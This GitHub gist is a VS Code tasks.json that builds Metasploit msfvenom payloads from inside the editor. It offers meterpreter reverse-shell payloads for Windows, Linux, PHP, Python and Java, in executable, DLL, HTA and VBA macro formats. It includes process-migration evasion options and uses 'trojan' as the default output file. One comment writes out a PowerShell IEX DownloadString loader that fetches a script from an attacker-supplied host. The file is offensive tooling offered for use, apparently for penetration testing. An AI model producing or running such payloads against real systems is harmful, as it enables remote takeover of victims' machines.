Skip to content

Instantly share code, notes, and snippets.

@Esonhugh
Created January 25, 2024 04:01
Show Gist options
  • Save Esonhugh/750f4e1d91b320e3960140d470c93c08 to your computer and use it in GitHub Desktop.
Save Esonhugh/750f4e1d91b320e3960140d470c93c08 to your computer and use it in GitHub Desktop.
vscode task based msfvenom payload generation
{
"version": "2.0.0",
"tasks": [
{
"label": "msfvenom payload creating",
"type": "shell",
"detail": "msfvenom payload creating task",
"problemMatcher": [],
"command": [
"msfvenom",
"-p",
"${input:msfvenom-payload}",
"LHOST=${input:msfvenom-lhost}",
"LPORT=${input:msfvenom-lport}",
"${input:msfvenom-payload-advanced-options}",
"-o",
"${input:msfvenom-output}",
"-f",
"${input:msfvenom-format}",
],
"presentation": {
"echo": true,
"reveal": "always",
"focus": false,
"panel": "new",
"showReuseMessage": false,
"clear": true,
"close": false
},
"runOptions": {
"runOn": "default"
},
"isBackground": false,
"promptOnClose": true,
"hide": false,
}
],
"inputs": [
{
"id": "msfvenom-payload",
"type": "pickString",
"description": "Select the payload",
"options": [
// Order with the most used payloads first
// Staged first, better stageless
"windows/x64/meterpreter/reverse_tcp",
"windows/meterpreter/reverse_tcp",
"linux/x64/meterpreter/reverse_tcp",
"linux/x86/meterpreter/reverse_tcp",
"php/meterpreter/reverse_tcp",
"python/meterpreter/reverse_tcp",
"windows/meterpreter/reverse_http",
"windows/x64/meterpreter/reverse_http",
"windows/meterpreter/reverse_https",
"windows/x64/meterpreter/reverse_https",
"java/meterpreter/reverse_tcp",
]
},
{
"id": "msfvenom-format",
"type": "pickString",
"description": "Select the format of the payload",
"options": [
// executable first, script second, web hta third
// "# DONOT Choose this.(psh is powershell script with loader,raw is used for python java php pyloads)",
"exe",
"elf",
"psh # psh is powershell payload with loader using `IEX(New-Object System.Net.WebClient).DownloadString('http://YOURIP:80/<output>.ps1');` to load in memory ",
"dll",
"hta-psh",
"psh-cmd",
"psh-net",
"psh-reflection",
"elf-so",
"exe-service",
"raw # php python java meterpreter will meet error if you choose like php python",
"raw | xxd -i # you can use this to get shellcode (but you need output in /dev/stdout)",
"jsp",
"jar",
"war",
"pl",
"asp",
"aspx",
"msi",
"python-reflection",
"vba",
"vba-exe",
"vba-psh",
"vbs",
]
},
{
"id": "msfvenom-lhost",
"type": "promptString",
"description": "Enter the LHOST",
"default": "10.10.",
},
{
"id": "msfvenom-lport",
"type": "promptString",
"description": "Enter the LPORT",
"default": "6789",
},
{
"id": "msfvenom-payload-advanced-options",
"type": "pickString",
"description": "Enter the advanced options",
"default": "",
"options": [
"",
"PrependMigrate=true PrependMigrateProc=explorer.exe",
"PrependFork=true",
"PrependSetuid=true",
"PrependSetuid=true PrependFork=true",
]
},
{
"id": "msfvenom-output",
"type": "promptString",
"description": "Enter the output filename. if you put /dev/stdout here, the output will be printed to the terminal",
"default": "${workspaceFolder}/trojan",
}
]
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment